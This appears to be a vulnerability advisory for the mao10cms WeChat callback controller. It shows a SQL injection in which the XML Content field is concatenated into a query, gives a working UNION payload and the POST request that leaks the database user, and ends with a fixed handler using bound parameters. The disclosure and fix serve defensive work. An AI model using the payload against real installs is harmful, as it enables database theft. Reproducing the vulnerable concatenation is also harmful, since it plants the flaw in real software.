<ul><li>/Application/Control/Controller/WeixinController.class.php</li></ul>
<pre class="">if( $tmpStr == $signature ){
    echo $echostr;
    $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
    if (!empty($postStr)){
        $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
        $fromUsername = $postObj->FromUserName;
        $toUsername = $postObj->ToUserName;
        $msgtype = $postObj->MsgType;
        $content = trim($postObj->Content);
        $date = strtotime("now");
        if($content!='') {
            // $content comes straight from the request XML and is concatenated into the WHERE clause
            $return_to = M('option')->where('type="wx_huifu" AND meta_key="'.$content.'"')->getField('meta_value');
            if($return_to!='') :
                $return_to_user = $return_to;
            else :
                $return_to_user = '我没有理解您的问题,请访问我们的网站:'.mc_site_url();
            endif;
            echo "<xml> <ToUserName>$fromUsername</ToUserName> <FromUserName>$toUsername</FromUserName> <CreateTime>$date</CreateTime> <MsgType>text</MsgType> <Content>$return_to_user</Content> </xml>";
        }
    }
}</pre>
<p>$content is taken directly from the user-supplied XML and concatenated into the SQL statement, which results in a SQL injection vulnerability.</p>
<p>When the user submits:</p>
<pre class=""><?xml version="1.0" encoding="utf-8"?>
<xml>
    <ToUserName>aa</ToUserName>
    <MsgType>aa</MsgType>
    <Content>asdasd") union select user()#</Content>
    <FromUserName>a</FromUserName>
</xml></pre>
<p>the SQL statement executed is:</p>
<pre class="">SELECT `meta_value` FROM `mc_option` WHERE ( type="wx_huifu" AND meta_key="asdasd") union select user()#" ) LIMIT 1</pre>
<p>The page returns:</p>
<p><img alt="57145FC8-2F19-448D-BEAF-32A75CF3B061.png" src="https://images.seebug.org/@/uploads/1434332447151-57145FC8-2F19-448D-BEAF-32A75CF3B061.png" data-image-size="364,87"></p>
<p>This confirms the vulnerability exists.</p>
<p>Using Hackbar, POST the content to:</p>
<pre class="">http://10.211.55.12/mao10cms/index.php?m=control&c=Weixin&a=callback_url&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce=&weixin_token=x</pre>
<p>with the body:</p>
<pre class=""><?xml version="1.0" encoding="utf-8"?>
<xml>
    <ToUserName>aa</ToUserName>
    <MsgType>aa</MsgType>
    <Content>asdasd") union select user()#</Content>
    <FromUserName>a</FromUserName>
</xml></pre>
<p>This yields the current database user:</p>
<p><img alt="96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" src="https://images.seebug.org/@/uploads/1434332488347-96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" data-image-size="489,270"></p>
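<p>The fix is to stop building the WHERE clause from the raw <Content> string. The handler below is an added example, not mao10cms code: it keeps the same lookup and reply logic but binds the keyword as a query parameter, so the payload shown above is compared against meta_key as a literal and never reaches the SQL grammar. It assumes PDO with the pdo_sqlite extension, a stub mc_site_url(), and a constructed mc_option table with one sample row.</p>

```php
<?php
// Added example, not mao10cms code. Table and column names follow the SQL shown
// above; the in-memory SQLite database (pdo_sqlite), the mc_site_url() stub and
// the sample rows are constructed for this demo.
function mc_site_url(): string { return 'https://example.invalid/'; }

function lookupReply(PDO $db, string $content): ?string {
    // The <Content> value is passed as a bound parameter, so whatever it holds
    // is compared against meta_key as a literal and cannot alter the query.
    $stmt = $db->prepare('SELECT meta_value FROM mc_option WHERE type = :type AND meta_key = :key LIMIT 1');
    $stmt->execute([':type' => 'wx_huifu', ':key' => $content]);
    $value = $stmt->fetchColumn();
    return $value === false ? null : $value;
}

function handleWeixinMessage(PDO $db, string $postStr): string {
    libxml_use_internal_errors(true); // malformed XML yields false instead of warnings
    $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
    if ($postObj === false) {
        return '';
    }
    $fromUsername = (string) $postObj->FromUserName;
    $toUsername   = (string) $postObj->ToUserName;
    $content      = trim((string) $postObj->Content);
    if ($content === '') {
        return '';
    }
    $reply = lookupReply($db, $content) ?? '我没有理解您的问题,请访问我们的网站:' . mc_site_url();
    // Escape every value before interpolating it into the reply XML.
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_XML1 | ENT_QUOTES, 'UTF-8');
    return '<xml>'
        . '<ToUserName>' . $esc($fromUsername) . '</ToUserName>'
        . '<FromUserName>' . $esc($toUsername) . '</FromUserName>'
        . '<CreateTime>' . time() . '</CreateTime>'
        . '<MsgType>text</MsgType>'
        . '<Content>' . $esc($reply) . '</Content>'
        . '</xml>';
}
// Constructed demo data: one configured auto-reply keyword.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE mc_option (type TEXT, meta_key TEXT, meta_value TEXT)');
$db->exec("INSERT INTO mc_option VALUES ('wx_huifu', 'hello', 'Welcome!')");

$benign  = '<xml><ToUserName>aa</ToUserName><FromUserName>a</FromUserName><Content>hello</Content></xml>';
$hostile = '<xml><ToUserName>aa</ToUserName><FromUserName>a</FromUserName>'
         . '<Content>asdasd") union select user()#</Content></xml>';
echo handleWeixinMessage($db, $benign), "\n";   // configured keyword: its meta_value is returned
echo handleWeixinMessage($db, $hostile), "\n";  // the page's payload is just an unmatched key, so the fallback text is sent
```

<p>Run it with <code>php example.php</code>; the second reply carries the fallback text because the bound keyword does not match any row, and the database never sees a union.</p>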